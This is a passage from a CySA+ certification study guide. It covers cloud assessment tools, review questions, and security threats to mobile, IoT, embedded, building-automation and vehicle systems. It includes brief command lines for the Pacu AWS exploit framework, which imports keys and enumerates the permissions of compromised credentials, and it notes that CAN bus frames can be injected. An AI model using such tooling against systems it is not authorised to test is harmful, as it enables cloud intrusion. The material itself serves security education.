Figure 4-12 oclHashcat
CLOUD INFRASTRUCTURE ASSESSMENT
TOOLS
As moving assets to the cloud becomes the rule and not the
exception, identifying and mitigating vulnerabilities in cloud
environments steadily increases in importance. There are several
monitoring and attack tools with which you should be familiar.
ScoutSuite
ScoutSuite is a data collection tool that allows you to use what
are called longitudinal survey panels to track and monitor the
cloud environment. It is open source and utilizes APIs made
available by the cloud provider. The following cloud providers
are currently supported/planned:
Amazon Web Services (AWS)
Microsoft Azure
Google Cloud Platform
Alibaba Cloud (alpha)
Oracle Cloud Infrastructure (alpha)
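As a usage sketch (assuming the pip-installed scout entry point
and an AWS credentials profile named audit), ScoutSuite is run
against one provider at a time and writes an HTML report of its
findings:

scout aws --profile audit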
Prowler
AWS Security Best Practices Assessment, Auditing, Hardening
and Forensics Readiness Tool, also called Prowler, allows you
to run reports of various types. These reports list gaps found
between your practices and best practices of AWS as stated in
CIS Amazon Web Services Foundations Benchmark 1.1.
Figure 4-13 shows partial sample report results. Notice that the
results are color coded to categorize any gaps found.
Figure 4-13 Prowler
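As a hedged usage sketch, assuming Prowler version 2's bash
interface, the tool can run all checks or only a named group
such as the CIS level 1 checks:

# run every check against the default AWS profile
./prowler
# run only the CIS level 1 group of checks
./prowler -g cislevel1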
Pacu
Exploit frameworks are packages of tools that provide a bed for
creating and launching attacks of various types. One of the more
famous of these is Metasploit. Pacu is an exploit framework
used to assess and attack AWS cloud environments. Using plug-in modules, it assists an attacker in the following tasks (a brief session sketch follows this list):
Enumeration
Privilege escalation
Data exfiltration
Service exploitation
Log manipulation
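A brief interactive session might look like the sketch below;
the commands are entered at the Pacu prompt after launch, and
the module name shown is illustrative because Pacu's module list
changes over time:

# start the framework
python3 pacu.py
# import credentials from the local AWS CLI configuration
import_keys --all
# enumerate what the compromised keys are permitted to do
run iam__enum_permissions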
EXAM PREPARATION TASKS
As mentioned in the section “How to Use This Book” in the
Introduction, you have several choices for exam preparation:
the exercises here, Chapter 22, “Final Preparation,” and the
exam simulation questions in the Pearson Test Prep Software
Online.
REVIEW ALL KEY TOPICS
Review the most important topics in this chapter, noted with
the Key Topics icon in the outer margin of the page. Table 4-2
lists a reference of these key topics and the page numbers on
which each is found.
Table 4-2 Key Topics in Chapter 4
Key Topic Element | Description | Page Number
Bulleted list | Software development life cycle (SDLC) | 72
Bulleted list | Approaches to static code review | 73
Bulleted list | Code review types | 73
Bulleted list | Approaches to dynamic testing | 74
Bulleted list | Fuzz testing types | 75
Bulleted list | TCP flags | 76
Bulleted list | Nmap scan types | 77
Example 4-1 | FIN scan using nmap | 78
Figure 4-8 | Host scan with nmap | 80
Bulleted list | Operations possible with hping | 80
Figure 4-9 | SYN flood | 81
Figure 4-10 | Capturing authentication hashes with Responder | 82
Bulleted list | Uses for Aircrack-ng | 83
Example 4-3 | Reaver: Wi-Fi Protected Setup Attack Tool | 84
Example 4-4 | wash: Wi-Fi Protected Setup Scan Tool | 85
DEFINE KEY TERMS
Define the following key terms from this chapter and check your
answers in the glossary:
web vulnerability scanners
synthetic transaction monitoring
real user monitoring (RUM)
Burp Suite
OWASP Zed Attack Proxy (ZAP)
Nikto
Arachni
Nessus Professional
OpenVAS
Qualys
software development life cycle (SDLC)
static code analysis
dynamic analysis
reverse engineering
fuzzing
enumeration
Nmap
Null scan
FIN scan
XMAS scan
host scanning
SYN flood
active enumeration
passive enumeration
Responder
Aircrack-ng
Reaver
oclHashcat
ScoutSuite
Prowler
Pacu
REVIEW QUESTIONS
1. The ________________________________________________
produces an interception proxy called ZAP.
2. Match the tool on the left with its definition on the right.
Tools | Definitions
Burp | An interception proxy produced by OWASP
Nikto | A Ruby framework for assessing the security of a web application
ZAP | Vulnerability scanner that is dedicated to web servers
Arachni | Can scan an application for vulnerabilities and can also be used to crawl an application (to discover content)
3. List at least one of the advantages of the cloud-based
approach to vulnerability scanning.
4. Arrange the following steps of the SDLC in the proper order.
Gather requirements
Certify/accredit
Release/maintain
Design
Test/validate
Perform change management and configuration
management/replacement
Develop
Plan/initiate project
5. ________________________ analysis is done without
the code executing.
6. List at least one form of static code review.
7. Match the type of code review on the left with its definition
on the right.
Review Types | Definitions
Reverse engineering | Injecting invalid or unexpected input
Fuzzing | Analyzing a subject system to identify the system’s components and their interrelationships
Real user monitoring | Running scripted transactions against an application
Synthetic transaction monitoring | Monitoring method that captures and analyzes every transaction
8. List at least one measure that can help prevent fault
injection attacks.
9. Match the following tools with their definitions.
Tools | Definitions
nmap | Used to attack Wi-Fi Protected Setup (WPS)
hping | Tool that can be used for answering NBT and LLMNR name requests
Responder | Command-line-oriented TCP/IP packet assembler/analyzer
Reaver | When used for scanning, it typically locates the devices, locates the open ports on the devices, and determines the OS on each host
10. List at least one of the cloud platforms supported by
ScoutSuite.
Chapter 5
Threats and Vulnerabilities
Associated with Specialized
Technology
This chapter covers the following topics related to Objective 1.5
(Explain the threats and vulnerabilities associated with
specialized technology) of the CompTIA Cybersecurity Analyst
(CySA+) CS0-002 certification exam:
Mobile: Discusses threats specific to the mobile environment.
Internet of Things (IoT): Covers threats specific to the IoT.
Embedded: Describes threats specific to embedded systems.
Real-time operating system (RTOS): Covers threats specific to
an RTOS.
System-on-Chip (SoC): Investigates threats specific to an SoC.
Field programmable gate array (FPGA): Covers threats
specific to FPGAs.
Physical access control: Discusses threats specific to physical
access control systems.
Building automation systems: Covers threats specific to
building automation systems.
Vehicles and drones: Describes threats specific to vehicles and
drones.
Workflow and process automation systems: Covers threats
specific to workflow and process automation systems.
Incident Command System (ICS): Discusses the use of ICS.
Supervisory control and data acquisition (SCADA): Covers
systems that operate with coded signals over communication
channels to provide control of remote equipment.
In some cases, the technologies that we create and develop to
enhance our ability to control the environment and to automate
processes create security issues. As we add functionality, we
almost always increase the attack surface. This chapter
describes specific issues that are unique to certain scenarios and
technologies.
“DO I KNOW THIS ALREADY?” QUIZ
The “Do I Know This Already?” quiz enables you to assess
whether you should read the entire chapter. If you miss no more
than one of these 12 self-assessment questions, you might want
to skip ahead to the “Exam Preparation Tasks” section. Table 5-1 lists the major headings in this chapter and the “Do I Know
This Already?” quiz questions covering the material in those
headings so that you can assess your knowledge of these specific
areas. The answers to the “Do I Know This Already?” quiz
appear in Appendix A.
Table 5-1 “Do I Know This Already?” Foundation Topics
Section-to-Question Mapping
Foundation Topics Section | Question
Mobile | 1
Internet of Things (IoT) | 2
Embedded | 3
Real-Time Operating System (RTOS) | 4
System-on-Chip (SoC) | 5
Field Programmable Gate Array (FPGA) | 6
Physical Access Control | 7
Building Automation Systems | 8
Vehicles and Drones | 9
Workflow and Process Automation Systems | 10
Incident Command System (ICS) | 11
Supervisory Control and Data Acquisition (SCADA) | 12
1. Which of the following is a specification first used in late
2001 that allows USB devices, such as tablets and
smartphones, to act as either a USB host or a USB device?
1. USB pass-through
2. USB-OTG
3. Ready Boost
4. Lo Jack
2. Which of the following is not one of the five categories of
IoT deployments?
1. LAN base
2. Smart home
3. Wearables
4. Connected cars
3. Which of the following describes a piece of software that is
built into a larger piece of software and is in charge of
performing some specific function on behalf of the larger
system?
1. Proprietary
2. Legacy
3. Embedded
4. Linked
4. VxWorks 6.5 is an example of a(n) _______________
system?
1. Modbus
2. embedded
3. RTOS
4. legacy
5. Which of the following is an example of a SoC that manages
all the radio functions in a network interface?
1. Dual-core processor
2. Broadband processor
3. Baseband processor
4. Hyper-processor
6. An FPGA is an example of which of the following?
1. SoC
2. PLD
3. PGA
4. Hypervisor
7. Which of the following is a series of two doors with a small
room between them?
1. Turnstile
2. Bollard
3. Mantrap
4. Moat
8. Which of the following is an application, network, and
media access control (MAC) layer communications service
used in HVAC systems?
1. BACnet
2. Modbus
3. CAN bus
4. BAP
9. Which of the following is designed to allow vehicle
microcontrollers and devices to communicate with each
other’s applications without a host computer?
1. CAN bus
2. ZigBee
3. Modbus
4. BAP
10. Which of the following is a tool used to automate network
functions?
1. DMVPN
2. Puppet
3. Net DNA
4. Modbus
11. Which of the following provides guidance for how to
organize assets to respond to an incident (system
description) and processes to manage the response through
its successive stages (concept of operations)?
1. ICS
2. DMVPN
3. IEE
4. IoT
12. Which of the following industrial control system
components connect to the sensors and convert sensor data
to digital data, including telemetry hardware?
1. PLCs
2. RTUs
3. BUS link
4. Modbus
FOUNDATION TOPICS
MOBILE
In today’s world, seemingly everyone in the workplace has at
least one mobile device. But with the popularity of mobile
devices have come increasing security issues. The increasing use
of mobile devices, combined with the fact that many of these
devices connect using public networks with little or no security,
presents security professionals with unique challenges.
Educating users on the risks related to mobile devices and
ensuring that they implement appropriate security measures
can help protect against threats involved with these devices.
Some of the guidelines that should be provided to mobile device
users include implementing a device-locking PIN, using device
encryption, implementing GPS location, and implementing
remote wipe. Also, users should be cautioned on downloading
apps without ensuring that they are coming from a reputable
source. In recent years, mobile device management
(MDM) and mobile application management (MAM) systems
have become popular in enterprises. They are implemented to
ensure that an organization can control mobile device settings,
applications, and other parameters when those devices are
attached to the enterprise network.
The threats presented by the introduction of personal mobile
devices (smartphones and tablets) to an organization’s network
include the following:
Insecure web browsing
Insecure Wi-Fi connectivity
Lost or stolen devices holding company data
Corrupt application downloads and installations
Missing security patches
Constant upgrading of personal devices
Use of location services
While the most common types of corporate information stored
on personal devices are corporate emails and company contact
information, it is alarming to note that some surveys show
almost half of these devices also contain customer data, network
login credentials, and corporate data accessed through business
applications.
To address these issues and to meet the rising demand by
employees to bring personal devices into the workplace and use
them for both work and personal purposes, many organizations
are creating bring your own device (BYOD) policies. As a
security professional, when supporting a BYOD initiative, you
should take into consideration that you probably have more to
fear from the carelessness of the users than you do from
hackers. Not only are they less than diligent in maintaining
security updates and patches on devices, they buy new devices
frequently to get the latest features. These factors make it
difficult to maintain control over the security of the networks in
which these devices are allowed to operate.
Centralized mobile device management tools are becoming the
fastest-growing solution for both organization-issued and
personal mobile devices. Some solutions leverage the messaging
server’s management capabilities, and others are third-party
tools that can manage multiple brands of devices. One example
is Systems Manager by Cisco that integrates with its Cisco
Meraki cloud services. Another example is the Apple
Configurator for iOS devices. One of the challenges with
implementing such a system is that not all personal devices may
support native encryption and/or the management process.
Typically, centralized MDM tools handle organization-issued
and personal mobile devices differently. For organization-issued
devices, a client application typically manages the configuration
and security of the entire device. If the device is a personal
device allowed through a BYOD initiative, the application
typically manages the configuration and security of itself and its
data only. The application and its data are sandboxed from the
other applications and data. The result is that the organization’s
data is protected if the device is stolen, while the privacy of the
user’s data is also preserved.
In Chapter 9, “Software Assurance Best Practices,” you will
learn about best practices surrounding the use of mobile
devices. The sections that follow look at some additional
security challenges posed by mobile devices.
Unsigned Apps/System Apps
Unsigned applications represent code that cannot be verified to
be what it purports to be or to be free of malware. While many
unsigned applications present absolutely no security issues,
most enterprises wisely choose to forbid their installation. MDM
software and security settings in the devices themselves can be
used to prevent this.
System apps are those that come preinstalled on the device.
While these apps probably present no security issue, some of
them run all the time, so it might be beneficial to remove them
to save space and to improve performance. The organization
also might decide that removing some system apps is necessary
to disable features in these apps that can disclose information
about the user or the device that could lead to a social
engineering attack. By following the instructions on the vendor
site, these apps can be removed.
Security Implications/Privacy Concerns
Security issues are inherent in mobile devices. Many of these
vulnerabilities revolve around storage devices. Let’s look at a
few.
Data Storage
While protecting data on a mobile device is always a good idea,
in many cases an organization must comply with an external
standard regarding the minimum protection provided to the
data on the storage device. For example, the Payment Card
Industry Data Security Standard (PCI DSS) enumerates
requirements that payment card industry players must meet to
secure and monitor their networks, protect cardholder data,
manage vulnerabilities, implement strong access controls, and
maintain security policies. Various storage types share certain
issues and present issues unique to the type.
Nonremovable Storage
The storage that is built into the device might not suffer all the
vulnerabilities shared by other forms but is still data at risk.
One tool at our disposal with this form of storage that is not
available with others is the ability to remotely wipe the data if
the device is stolen. At any rate, the data should be encrypted
with AES 128/256-bit encryption. Also, be sure to have a
backup copy of the data stored in a secure location.
Removable Storage
While removable storage may be desirable in that it may not be
stolen if the device is stolen, it still can be lost and stolen itself.
Removable storage of any type represents one of the primary
ways data exfiltration occurs. If removable storage is in use, the
data should be encrypted with AES 128/256-bit encryption.
Transfer/Back Up Data to Uncontrolled Storage
In some cases users store sensitive data in cloud storage that is
outside the control of the organization, using sites such as
Dropbox. These storage providers have had their share of data
loss issues as well. Policies should address and forbid this type
of storage of data from mobile devices.
USB OTG
USB On-The-Go (USB OTG) is a specification first used in
late 2001 that enables USB devices, such as tablets and
smartphones, to act as either a USB host or a USB device. With
respect to smartphones, USB OTG has been used to hack
around an iPhone security feature that requires a valid Apple ID and password to use a device after a factory reset.
This feature is supplied to prevent the use of a stolen
smartphone that has been reset to factory defaults, but it can be
defeated with a hack using USB OTG.
Device Loss/Theft
Of course, one of the biggest threats to organizations is a lost or
stolen device containing irreplaceable or sensitive data.
Organizations should ensure that they can remotely wipe the
device when this occurs. Moreover, policies should require that corporate data be backed up to a server so that a remote wipe does not delete data that resides only on the device.
Rooting/Jailbreaking
While rooting or jailbreaking a device enables the user to
remove some of the restrictions of the device, it also presents
security issues. Jailbreaking removes the security restrictions
on your iPhone or iPad. This means apps are given access to the
core functions of the device, access that normally requires user consent. It also allows the installation of apps not found in the App Store. One of the reasons those apps are not in the App Store is that they are either insecure or malware masquerading
as a legitimate app. Finally, a rooted or jailbroken device
receives no security updates, making it even more vulnerable.
Push Notification Services
Push notification services allow unsolicited messages to be
sent by an application to a mobile device even when the
application is not open on the device. Although these services
can be handy, there are some security best practices to follow when developing these services for your organization (see the sketch after this list):
Do not send company confidential data or intellectual property in
the message payload.
Do not store your SSL certificate and list of device tokens in your
web-root.
Be careful not to inadvertently expose APNs (Apple Push Notification service) certificates or device tokens.
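The first guideline can be made concrete with a short sketch. The following Python fragment (assuming the third-party requests library) sends a push payload that carries only an opaque message ID rather than confidential content; the gateway URL and token are hypothetical placeholders, since each push provider has its own API.

import requests

PUSH_GATEWAY = "https://push.example.com/v1/send"  # hypothetical endpoint
API_TOKEN = "..."  # retrieved from a secrets vault, not hardcoded in practice

def notify(device_token: str, message_id: str) -> None:
    payload = {
        "to": device_token,
        # No confidential data or intellectual property in the payload --
        # only an opaque ID the app exchanges for the real content after
        # it authenticates to the back end.
        "data": {"type": "new_message", "id": message_id},
    }
    resp = requests.post(
        PUSH_GATEWAY,
        json=payload,
        headers={"Authorization": f"Bearer {API_TOKEN}"},
        timeout=10,
    )
    resp.raise_for_status()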
Geotagging
Geotagging is the process of adding geographical
identification metadata to various media and is enabled by
default on many smartphones (to the surprise of some users). In
many cases, this location information can be used to locate
where images, video, websites, and SMS messages originate. At
the very least, this information can be used to assemble a social
engineering attack. This information has been used in the past
to reveal the location of high-value goods. In an extreme case,
four U.S. Army Apache helicopters were destroyed (on the
ground) by the enemy after they were able to pinpoint the
helicopters’ location through geotagged photos taken by U.S.
soldiers and posted on the Internet.
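Because geotags travel silently inside image metadata, it is worth checking for them before photos are published. The following is a minimal sketch in Python, assuming the third-party Pillow imaging library is installed; it tests for the standard EXIF GPSInfo tag (0x8825), and the file name is hypothetical.

from PIL import Image

GPS_IFD_TAG = 0x8825  # standard EXIF "GPSInfo" tag

def is_geotagged(path: str) -> bool:
    # Returns True if the image carries GPS metadata.
    with Image.open(path) as img:
        return GPS_IFD_TAG in img.getexif()

print(is_geotagged("vacation.jpg"))  # hypothetical file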
OEM/Carrier Android Fragmentation
Android fragmentation refers to the overwhelming number of
versions of Android that have been sold. The primary issue is
that many users are still running an older version for which
security patches are no longer available. The fault is typically
that of the phone manufacturer for either maintaining use of an
operating system when a new one is available or by customizing
the OS (remember, Android is open source) so much that the
security patches are incompatible. Organizations should
consider these issues when choosing a phone manufacturer.
Mobile Payment
One of the latest features of smartphones is the ability to pay for
items using the smartphone instead of a credit card. Various technologies are used to make this possible, and each has attendant security issues. Let's look at how these technologies
work.
NFC Enabled
A new security issue facing both merchants and customers is the security of payment systems that use near field communication (NFC), such as Apple Pay and Google Pay.
NFC is a short-range type of wireless transmission and is
therefore difficult to capture. Moreover, these transmissions are
typically encrypted. However, interception is still possible. In
any case, some steps can be taken to secure these payment
mechanisms:
Lock the mobile device. Devices must be turned on or unlocked
before they can read any NFC tags.
Turn off NFC when not in use.
For passive tags, use an RFID/NFC-blocking device.
Scan mobile devices for unwanted apps, spyware, and other threats
that may siphon information from your payment apps.
Inductance Enabled
Inductance is the process used in NFC to transmit the
information from the smartphone to the reader. Coils made of
ferrite material use electromagnetic induction to transmit
information. Therefore, an inductance-enabled device would be
one that supports a mobile payment system. While capturing
these transmissions is possible, the attacker must be very close.
Mobile Wallet
An alternative technology used in mobile payment systems is
the Mobile Wallet used by online companies like PayPal,
Amazon Payments, and Google Pay. In this system, the user registers a card number and is issued a PIN that is used to authorize payments. The PIN identifies both the user and the card, and payments are charged to that card.
Peripheral-Enabled Payments (Credit Card Reader)
Credit card readers that can read from a mobile phone at close
range are also becoming ubiquitous, especially with merchants
that operate in remote locations such as cabs, food trucks, and
flea markets. Figure 5-1 shows one such device reading a card.
Figure 5-1 Peripheral-Enabled Payments (Credit Card
Reader)
USB
Because this connection uses bounded media, it may be the safest way to make a payment connection. The only way a malicious individual could make this kind of connection would be to gain physical access to the mobile device, so physical security is the main mitigation.
Malware
Just like laptops and desktops, mobile devices are targets of
viruses and malware. Major antivirus vendors such as McAfee
and Kaspersky make antivirus and anti-malware products for
mobile devices that provide the same real-time protection that similar products do for desktops. The same guideline that
applies to computers applies to mobile devices: keep the
antivirus/anti-malware product up to date by setting the device
to check for updates whenever connected to the Internet.
Unauthorized Domain Bridging
Most smartphones can act as a wireless hotspot. When a device that is a member of the domain also acts as a hotspot, it can give anyone using the hotspot access to the organizational network. This is called unauthorized domain bridging and should be forbidden. Software is available that can prevent this by allowing only a single communications adapter to be active at a time, disabling all other communications adapters installed on each computer authorized to access the network.
SMS/MMS/Messaging
Short Message Service (SMS) is a text messaging service
component of most telephone, World Wide Web, and mobile
telephony systems. Multimedia Messaging Service (MMS)
handles messages that include graphics or videos. Both
technologies present security challenges. Because messages are
sent in clear text, both are susceptible to spoofing and
spamming.
INTERNET OF THINGS (IOT)
The Internet of Things (IoT) refers to a system of
interrelated computing devices, mechanical and digital
machines, and objects that are provided with unique identifiers
and the ability to transfer data over a network without requiring
human-to-human or human-to-computer interaction. The IoT
has presented attackers with a new medium through which to
carry out an attack. Often the developers of the IoT devices add
the IoT functionality without thoroughly considering the
security implications of such functionality or without building
in any security controls to protect the IoT devices.
Note
IoT is a term for all physical objects, or “things,” that are now embedded with
electronics, software, and network connectivity. Thanks to the IoT, these objects
—including automobiles, kitchen appliances, and heating and air conditioning
controllers—can collect and exchange data. Unfortunately, engineers give most
of these objects this ability just for convenience and without any real
consideration of the security impacts. When these objects are then deployed,
consumers do not think of security either. The result is consumer convenience
but also risk. As the IoT evolves, security professionals must be increasingly
involved in the IoT evolution to help ensure that security controls are designed to
protect these objects and the data they collect and transmit.
IoT Examples
IoT deployments include a wide variety of devices, but are
broadly categorized into five groups:
Smart home: Includes products that are used in the home. They
range from personal assistance devices, such as Amazon Alexa, to
HVAC components, such as Nest thermostats. These devices are
designed for home management and automation.
Wearables: Includes products that are worn by users. They range
from watches, such as the Apple Watch, to personal fitness devices,
like the Fitbit.
Smart cities: Includes devices that help resolve traffic congestion
issues and reduce noise, crime, and pollution. They include smart
energy, smart transportation, smart data, smart infrastructure, and
smart mobility devices.
Connected cars: Includes vehicles that include Internet access
and data sharing capabilities. Technologies include GPS devices,
OnStar, and AT&T connected cars.
Business automation: Includes devices that automate HVAC,
lighting, access control, and fire detection for organizations.
Methods of Securing IoT Devices
Security professionals must understand the different methods
of securing IoT devices. The following are some
recommendations:
Secure and centralize the access logs of IoT devices.
Use encrypted protocols to secure communication.
Create secure password policies.
Implement restrictive network communications policies, and set up
virtual LANs.
Regularly update device firmware based on vendor
recommendations.
When selecting IoT devices, particularly those that are
implemented at the organizational level, security professionals
need to look into the following:
Does the vendor design explicitly for privacy and security?
Does the vendor have a bug bounty program and vulnerability
reporting system?
Does the device have manual overrides or special functions for
disconnected operations?
EMBEDDED SYSTEMS
An embedded system is a piece of software that is built into a
larger piece of software and is in charge of performing some
specific function on behalf of the larger system. The embedded
part of the solution might address specific hardware
communications and might require drivers to talk between the
larger system and some specific hardware. For more
information, see Chapter 9.
REAL-TIME OPERATING SYSTEM (RTOS)
Real-time operating systems (RTOSs) are designed to
process data as it comes in, typically without buffer delays. Like
all systems, they have a certain amount of latency in the
processing. One of the key issues with these systems is to
control the jitter (the variability of such latency).
Many IoT devices use an RTOS. These operating systems were
not really designed for security and some issues have surfaced.
For example, VxWorks 6.5 and later versions have been found to be susceptible to vulnerabilities that allow remote attackers full control over targeted devices. The Armis security firm
discovered and announced 11 vulnerabilities, including six
critical vulnerabilities, collectively branded URGENT/11 in the
summer of 2019. This is disturbing, because VxWorks is used in
mission-critical systems for the enterprise, including SCADA,
elevator, and industrial controllers, as well as in healthcare
equipment, including patient monitors and MRI scanners.
SYSTEM-ON-CHIP (SOC)
System-on-Chip (SoC) designs have become common in cell phone electronics because of their reduced energy use. A baseband processor is a
chip in a network interface that manages all the radio functions.
A baseband processor typically uses its own RAM and firmware.
Since the software that runs on baseband processors is usually
proprietary, it is impossible to perform an independent code
audit. In March 2014, makers of the free Android derivative
Replicant announced they had found a backdoor in the
baseband software of Samsung Galaxy phones that allows
remote access to the user data stored on the phone. Although it
has been some time since this happened, it is a reminder that
SoCs can be a security issue.
FIELD PROGRAMMABLE GATE ARRAY
(FPGA)
A programmable logic device (PLD) is an integrated circuit with
connections or internal logic gates that can be changed through
a programming process. A field programmable gate array
(FPGA) is a type of PLD that is programmed by blowing fuse
connections on the chip or using an antifuse that makes a
connection when a high voltage is applied to the junction.
FPGAs are used extensively in IoT implementations and in
cloud scenarios. In 2019, scientists discovered a vulnerability in
FPGAs. In a side-channel attack, cyber criminals use the energy
consumption of the chip to retrieve information that allows
them to break its encryption. It is also possible to tamper with
the calculations or even to crash the chip altogether, possibly
resulting in data losses.
PHYSICAL ACCESS CONTROL
Access control is all about using physical or logical controls to determine who or what has access to a network, system, or device, as well as what type of access is given to the information, network, system, device, or facility.
Physical access focuses on controlling access to a network,
system, or device. In most cases, physical access involves using
access control to prevent users from being able to touch
network components (including wiring), systems, or devices.
While locks are the most popular physical access control method for preventing access to devices in a data center, other
physical controls, such as guards and biometrics, should also be
considered, depending on the needs of the organization and the
value of the asset being protected.
When installing an access control system, security professionals
should understand who needs access to the asset being
protected and how those users need to access the asset. When
multiple users need access to an asset, the organization should
set up a multilayer access control system. For example, users
wanting access to the building may only need to sign in with a
security guard. However, to access the locked data center within
the same building, users would need a smart card. Both of these
would be physical access controls. To protect data on a single
server within the building (but not in the data center), the
organization would need to deploy such mechanisms as
authentication, encryption, and access control lists (ACLs) as
logical access controls but could also place the server in a locked
server room to provide physical access control. When deploying
physical and logical access controls, security professionals must
understand the access control administration methods and the
different assets that must be protected and their possible access
controls.
Systems
To fully protect the systems used by the organization, including
client and server computers, security professionals may rely on
both physical and logical access controls. However, some
systems, like client computers, may be deployed in such a
manner that only minimal physical controls are used. If a user is
granted access to a building, he or she may find client
computers being used in nonsecure cubicles throughout the
building. For these systems, a security professional must ensure
that the appropriate authentication mechanisms are deployed.
If confidential information is stored on the client computers,
encryption should also be deployed. But only the organization
can best determine which controls to deploy on individual client
computers. When it comes to servers, determining which access
controls to deploy is usually a more complicated process.
Security professionals should work with the server owner,
whether it is a department head or an IT professional, to
determine the value of the asset and the needed protection. Of
course, most servers should be placed in a locked room. In
many cases, this will be a data center or server room. However,
servers can be deployed in regular locked offices if necessary. In
addition, other controls should be deployed to ensure that the
system is fully protected. The access control needs of a file
server are different from those of a web server or database
server. It is vital that the organization perform a thorough
assessment of the data that is being processed and stored on the
system before determining which access controls to deploy. If
limited resources are available, security professionals must
ensure that their most important systems have more access
controls than other systems.
Devices
As with systems, physical access to devices is best provided by
placing the devices in a secure room. Logical access to devices is
provided by implementing the appropriate ACL or rule list,
authentication, and encryption, as well as securing any remote
interfaces that are used to manage the device. In addition,
security professionals should ensure that the default accounts
and passwords are changed or disabled on the device. For any
IT professionals that need to access the device, a user account
should be configured for the professional with the appropriate
level of access needed. If a remote interface is used, make sure to enable encryption, such as TLS, to ensure that communication via the remote interface is not intercepted and
read. Security professionals should closely monitor vendor
announcements for any devices to ensure that the devices are
kept up to date with the latest security patches and firmware
updates.
Facilities
With facilities, the primary concern is physical access, which
can be provided using locks, fencing, bollards, guards, and
closed-circuit television (CCTV). Many organizations think that
such measures are enough. But with today’s advanced industrial
control systems and the IoT, organizations must also consider
any devices involved in facility security. If an organization has
an alarm/security system that allows remote viewing access
from the Internet, the appropriate logical controls must be in
place to prevent a malicious user from accessing the system and
changing its settings or from using the system to gain inside
information about the facility layout and day-to-day operations.
If the organization uses an industrial control system (ICS),
logical controls should also be a priority. Security professionals
must work with organizations to ensure that physical and
logical controls are implemented appropriately to ensure that
the entire facility is protected.
Note
The abbreviation ICS is used for two different terms in this chapter: industrial control system (ICS) and Incident Command System (ICS).
Physical access control systems are any systems used to allow or
deny physical access to the facility. Examples include the
following:
Mantrap: This is a series of two doors with a small room between
them. The user is authenticated at the first door and then allowed
into the room. At that point, additional verification occurs (such as
a guard visually identifying the person), and then the person is
allowed through the second door. Mantraps are typically used only
in very high-security situations. They can help prevent tailgating.
Figure 5-2 illustrates a mantrap design.
Figure 5-2 Mantrap
Proximity readers: These readers are door controls that read a
proximity card from a short distance and are used to control access
to sensitive rooms. These devices can also provide a log of all entries
and exits.
IP-based access control and video systems: When using these
systems, a network traffic baseline for each system should be
developed so that unusual traffic can be detected.
Some higher-level facilities are starting to incorporate
biometrics as well, especially in high-security environments
where terrorist attacks are a concern.
BUILDING AUTOMATION SYSTEMS
The networking of facility systems has enhanced the ability to
automate the management of systems, including the following:
Lighting
HVAC
Water systems
Security alarms
Bringing together the management of these seemingly disparate
systems allows for the orchestration of their interaction in ways
that were never before possible. When industry leaders discuss
the IoT, the success of building automation is often used as a
real example of where connecting other devices, such as cars
and street signs, to the network can lead. These systems usually
can pay for themselves in the long run by managing the entire
ecosystem more efficiently in real time than a human could ever
do. If a wireless version of such a system is deployed, keep the
following issues in mind:
Interference issues: Construction materials may prevent you
from using wireless everywhere.
Security: Use encryption, separate the building automation
systems (BAS) network from the IT network, and prevent routing
between the networks.
Power: When Power over Ethernet (PoE) cannot provide power to
controllers and sensors, ensure that battery life supports a
reasonable lifetime and that procedures are created to maintain
batteries.
IP Video
IP video systems provide a good example of the benefits of
networking applications. These systems can be used for both
surveillance of a facility and facilitating collaboration. An
example of the layout of an IP surveillance system is shown in
Figure 5-3.
FIGURE 5-3 IP Surveillance
IP video has also ushered in a new age of remote collaboration.
It has saved a great deal of money on travel expenses while at
the same time making more efficient use of time.
Issues to consider and plan for when implementing IP video
systems include the following:
Expect a large increase in the need for bandwidth.
QoS needs to be configured to ensure performance.
Storage needs to be provisioned for the camera recordings. This
could entail cloud storage, if desired.
The initial cost may be high.
HVAC Controllers
One of the best examples of the marriage of IP networks and a
system that formerly operated in a silo is the heating,
ventilation, and air conditioning (HVAC) system. HVAC
systems usually use a protocol called Building Automation
and Control Networks (BACnet), which is an application,
network, and media access control (MAC) layer
communications service. It can operate over a number of Layer
2 protocols, including Ethernet.
To use the BACnet protocol in an IP world, BACnet/IP (B/IP)
was developed. The BACnet standard makes exclusive use of
MAC addresses for all data links, including Ethernet. To
support IP, IP addresses are needed. BACnet/IP, Annex J,
defines an equivalent MAC address composed of a 4-byte IP
address followed by a 2-byte UDP port number. A range of 16
UDP port numbers has been registered as hexadecimal BAC0
through BACF.
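A minimal sketch in Python (standard library only) shows how compact the Annex J address format is: the 6-byte B/IP address is simply the 4-byte IPv4 address followed by the 2-byte UDP port, with 0xBAC0 as the default port.

import socket
import struct

def bip_address(ip: str, port: int = 0xBAC0) -> bytes:
    # 4-byte IPv4 address + 2-byte UDP port = 6-byte B/IP "MAC address"
    return socket.inet_aton(ip) + struct.pack("!H", port)

print(bip_address("192.168.1.20").hex())  # c0a80114bac0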
While putting HVAC systems on an IP network makes them
more manageable, it has become apparent that these networks
should be separate from the internal network. In the infamous Target breach, hackers broke into the network of a vendor that managed Target's HVAC systems. The intruders leveraged the trust and network access granted to the HVAC vendor by Target and then, from these internal systems, broke
into the point-of-sale systems and stole credit and debit card
numbers, as well as other personal customer information.
Sensors
Sensors are designed to gather information of some sort and
make it available to a larger system, such as an HVAC
controller. Sensors and their role in SCADA systems are covered
later in this chapter.
VEHICLES AND DRONES
Wireless capabilities added to vehicles and drones have ushered
in a new world of features, while at the same time opening the door for all sorts of vulnerabilities common to any network-connected device.
Connected vehicles are not those that drive themselves,
although those are coming. A connected vehicle is one that can
be reached with a wireless connection of some sort. McAfee has identified the attack surface that exists in a connected
vehicle. Figure 5-4 shows the areas of vulnerability.
Figure 5-4 Vehicle Attack Surface
As you can see in Figure 5-4, critical vehicle systems may be
vulnerable to wireless attacks.
CAN Bus
While autonomous vehicles may still be a few years off, today's connected vehicles already depend on an in-vehicle communication standard. Controller Area Network (CAN bus) is designed to allow vehicle microcontrollers and devices to communicate with each other's applications without a host computer. Sounds great, huh?
It turns out CAN is a low-level protocol and does not support
any security features intrinsically. There is also no encryption in
standard CAN implementations, which leaves these networks
open to data interception.
Failure by vendors to implement their own security measures
may result in attacks if attackers manage to insert messages on
the bus. While passwords exist for some safety-critical
functions, such as modifying firmware, programming keys, or
controlling antilock brake actuators, these systems are not
implemented universally and have a limited number of
seed/key pairs (meaning a brute-force attack is more likely to
succeed). Hopefully, an industry security standard for the CAN
bus will be developed at some point.
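To see why the lack of built-in authentication matters, consider this minimal sketch in Python, assuming the third-party python-can package and a Linux virtual CAN interface (vcan0); the arbitration ID and data bytes are arbitrary placeholders. Nothing on the bus verifies who sent the frame.

import can

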